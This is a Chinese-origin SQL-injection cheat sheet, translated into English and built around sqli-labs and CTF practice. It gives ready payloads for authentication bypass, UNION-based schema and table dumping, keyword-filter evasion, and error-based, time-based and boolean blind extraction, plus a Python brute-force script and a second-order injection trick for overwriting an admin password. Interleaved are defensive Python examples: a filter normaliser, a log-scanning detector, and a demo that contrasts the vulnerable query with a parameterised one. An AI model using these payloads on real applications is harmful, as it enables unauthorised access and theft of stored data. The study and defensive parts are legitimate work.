SQLi summary

Techniques

Detecting the closing character

' " ) ))

Universal password (authentication bypass)

username=' or 1=1#&password=1

Dumping database names

union select 1,group_concat(table_schema),3 from information_schema.columns
union select 1,2,group_concat(schema_name) from information_schema.schemata--+
union select database();#

Dumping table names

union select 1,group_concat(distinct table_name) from information_schema.columns where table_schema = 'DATABASENAME'

Dumping column names

union select 1,group_concat(distinct column_name),3 from information_schema.columns where table_name= 'TABLENAME' and table_schema= 'DATABASENAME'

Keyword filter bypasses

se/**/lect

sel<>ect

sElect

selselectect

sel ect (when the filter strips spaces)

?username=' uniunionon selselectect 1,group_concat(distinct table_schema),3 frfromom inforormation_schema.columns#&password=' oorr '1'='1
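Every bypass above targets a filter that matches or strips keywords once, on the raw string, while MySQL parses something else (case-folded, comments removed). The following added example, not from the original page, models that single-pass filter in Python and contrasts it with normalising first and stripping to a fixed point; the keyword list and function names are this example's own choices.

```python
import re

# Keywords a stripping filter of the kind the bypasses above target would remove.
# Deliberately short: adding "or"/"and" would also eat "password" and "information".
KEYWORDS = ("union", "select", "from")

def weak_strip(payload):
    """Single, case-sensitive removal pass: the filter model that
    'selselectect' (re-assembles after one pass) and 'sElect' (case) defeat."""
    for kw in KEYWORDS:
        payload = payload.replace(kw, "")
    return payload

def as_parsed(payload):
    """Approximate what MySQL's parser sees: keywords are case-insensitive and
    /* */ comments are whitespace, so 'se/**/lect' and 'sElect' both read as select."""
    s = re.sub(r"/\*.*?\*/", "", payload, flags=re.S)
    return s.lower()

def strip_to_fixpoint(payload):
    """Normalise first, then remove keywords until nothing changes, so that a
    re-assembled keyword ('selselectect' -> 'select') does not survive."""
    s = as_parsed(payload)
    while True:
        stripped = s
        for kw in KEYWORDS:
            stripped = stripped.replace(kw, "")
        if stripped == s:
            return s
        s = stripped

def contains_keyword(payload):
    """Detection variant: true if normalisation exposes any listed keyword."""
    s = as_parsed(payload)
    return any(kw in s for kw in KEYWORDS)

if __name__ == "__main__":
    for p in ("selselectect", "sElect", "se/**/lect", "uniunionon selselectect 1 frfromom x"):
        print(f"{p!r:45} weak_strip={weak_strip(p)!r:12} fixpoint={strip_to_fixpoint(p)!r}")
```

The `sel<>ect` and `sel ect` forms rely on a different layer (HTML-tag or whitespace stripping) running after the keyword check, which the normaliser would have to mirror as well; the practical lesson is that a blacklist must normalise exactly as every downstream layer does, and that prepared statements remove the problem instead of chasing it.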

Error-based injection

~ can be replaced with its ASCII code 0x7e, to avoid losing the leading characters

1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name="users")),1)#

view.php?no=1 and updatexml(1,make_set(3,'~',(select data from users)),1)#
and updatexml(1,concat(0x7e,(select distinct concat(0x7e,(select schema_name),0x7e) from admin limit 0,1),0x7e),1)

substr()+ascii()

Regular-expression matching with regexp()

and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)%23

Checks whether the users table has a column whose name begins with us

ord()+mid()

and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1))= 68%23

ord() returns the ASCII code

mid() extracts the specified characters from a field

cast() converts username to a string

IFNULL(expr1,expr2): if expr1 is not NULL, IFNULL() returns expr1; otherwise it returns expr2. The return value of IFNULL() is numeric or a string, depending on the context in which it is used.

Strings

admin => 0x61646D696E (hexadecimal)

Time-based injection

and If(ascii(substr(database(),1,1))>100,1,sleep(5))--+

Blind injection

or ascii(substr(database(),1,1))>100#

Boolean-based blind injection

or left(database(),1)='s'#
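A defender usually meets the error-based, time-based and boolean payloads listed above in web-server logs rather than at the database. The following added Python example, not from the original page, URL-decodes the request target from a few constructed combined-format log lines, normalises it (case, comments, double encoding) and tags it by technique; the log lines, signature names and regular expressions are this example's own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Only the request
# target matters here; the rest is the usual combined-log shape.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?no=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?no=1%20and%20updatexml(1,make_set(3,'~',(select%20data%20from%20users)),1)%23 HTTP/1.1" 500 233
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%27%20and%20If(ascii(substr(database(),1,1))%3E100,1,sleep(5))--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=1%27%20or%20left(database(),1)=%27s%27%23 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=select%20your%20seat HTTP/1.1" 200 800
"""

# Signature names are this example's own labels, one per technique on the page.
SIGNATURES = {
    "error-based": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "boolean-blind": re.compile(r"\b(ascii|ord|substr|substring|mid|left)\s*\(.*?[<>=]"),
    "schema-enum": re.compile(r"information_schema|\bgroup_concat\s*\("),
    "union": re.compile(r"\bunion\b.*?\bselect\b"),
}

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP')

def normalize(target):
    """Decode twice (catches double encoding), fold case, drop /* */ comments,
    collapse whitespace: the same view the keyword-bypass section says a filter needs."""
    s = unquote_plus(unquote_plus(target)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s)

def classify(target):
    """Return the list of technique labels whose signature matches the target."""
    s = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(s)]

def scan_log(text):
    """Yield (client_ip, raw_target, labels) for every request that matched."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        labels = classify(m.group(1))
        if labels:
            hits.append((line.split()[0], m.group(1), labels))
    return hits

if __name__ == "__main__":
    for ip, target, labels in scan_log(SAMPLE_LOG):
        print(ip, labels, target)
```

Signature matching of this kind is a triage aid, not a control: the fifth line shows why the word `select` alone is not a signal, and the third line shows that one request can carry two techniques at once (a time-based sleep gated on a boolean comparison), so labels are returned as a list rather than a single verdict.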

Stacked injection

Scenario: the database call uses mysqli_multi_query(), which executes multiple statements separated by ;

-1';show tables#

Exploiting sql-mode

View the current sql-mode

SELECT @@GLOBAL.sql_mode;
SELECT @@SESSION.sql_mode;

Set the sql-mode

SET GLOBAL sql_mode = 'modes...';
SET SESSION sql_mode = 'modes...';

Common sql-mode values

Back-end logic

select $_POST[query] || flag from flag  => query = *,1

Change the sql-mode so that || acts as concat: query = 1;set sql_mode=PIPES_AS_CONCAT;SELECT 1, which produces
SELECT 1;set sql_mode=PIPES_AS_CONCAT;SELECT 1 || flag FROM Flag

sqli-labs practice notes

Level 1

id=-1%27 union select 1,group_concat(schema_name),3 from information_schema.schemata%23
id=-1%27 union select 1,group_concat(table_name),3 from information_schema.tables%23

Level 5: brute force

exp

import requests
import re

url = "http://xxxx/?id=1"
payload = ''
flag_in = 'You are in'   # text the page shows when the injected condition is true

# First digit of version(): 0-9 (the original range(0, 9) never tried 9)
for i in range(0, 10):
    payload = url + "%27 and left(version(),1)="+str(i)+"%23"
    r = requests.get(payload)
    if re.findall(flag_in, r.text):
        print("First number of version:"+str(i))
        break

# Length of the current database name
for j in range(0, 30):
    payload = url + "%27 and length(database())="+str(j)+"%23"
    q = requests.get(payload)
    if re.findall(flag_in, q.text):
        print("The length of database is:" + str(j))
        break

Binary-search comparison

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80%23

regexp()

Level 24: second-order injection

Source of the password-change section

if($pass==$re_pass)
{
    // $username is taken from the session as stored at registration and interpolated unescaped
    $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
    $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
    $row = mysql_affected_rows();
    echo '<font size="3" color="#FFFF00">';
    echo '<center>';
    if($row==1)
    {
        echo "Password successfully updated";

    }
    else
    {
        header('Location: failed.php');
        //echo 'You tried to be smart, Try harder!!!! :( ';
    }
}
else
{
    echo '<font size="5" color="#FFFF00"><center>';
    echo "Make sure New Password and Retype Password fields have same value";
    header('refresh:2, url=index.php');
}

Create the username admin'# and then choose change password: this directly overwrites admin's password
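The password-change code above interpolates $username after it was escaped only once, at registration time, which is the second-order pattern. The following added Python example, not from sqli-labs or the original page, reproduces that flow against an in-memory SQLite table with the string-built UPDATE beside a parameterised one. SQLite uses `--` for comments, so the registered name `admin'-- ` stands in for the page's `admin'#`; the table layout, passwords and function names are constructed for the example.

```python
import sqlite3

def new_db():
    """Constructed in-memory stand-in for the sqli-labs users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con

def escape(s):
    """Quote escaping done at registration (SQLite spelling of what
    mysql_real_escape_string does for quotes). The stored value is still raw."""
    return s.replace("'", "''")

def register(con, username, password):
    # Escaped at insert time, so the INSERT itself is not injectable.
    con.execute(f"INSERT INTO users VALUES ('{escape(username)}', '{escape(password)}')")

def change_password_vulnerable(con, username, curr_pass, new_pass):
    # Mirrors the page's UPDATE: the username comes back out of the session
    # exactly as stored and is interpolated without escaping.
    sql = (f"UPDATE users SET password='{new_pass}' "
           f"WHERE username='{username}' AND password='{curr_pass}'")
    return con.execute(sql).rowcount

def change_password_safe(con, username, curr_pass, new_pass):
    # Placeholders: the stored name is data, whatever characters it contains.
    return con.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new_pass, username, curr_pass)).rowcount

def password_of(con, username):
    row = con.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0]

# SQLite spelling of the page's admin'# (trailing space keeps the comment marker intact).
ATTACKER = "admin'-- "

def demo():
    """Return admin's password after the vulnerable flow and after the safe flow."""
    con = new_db()
    register(con, ATTACKER, "x")
    change_password_vulnerable(con, ATTACKER, "x", "pwned")   # WHERE username='admin'-- ...
    after_vulnerable = password_of(con, "admin")

    con = new_db()
    register(con, ATTACKER, "x")
    change_password_safe(con, ATTACKER, "x", "pwned")         # touches only the attacker's own row
    after_safe = password_of(con, "admin")
    return after_vulnerable, after_safe

if __name__ == "__main__":
    print(demo())
```

The point the example makes is that escaping is tied to one statement: the registration INSERT was protected, but the value written to the table is the original string, and every later statement that embeds it has to protect itself again. Bound parameters do that by construction, which is why the safe variant changes only the row literally named `admin'-- `.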

Database characteristics

MySQL

A MySQL characteristic: when inserted data exceeds the length defined for the column, the database silently truncates it and performs the insert without any error

The sql-mode STRICT_TRANS_TABLES can restrict this

MySQL regex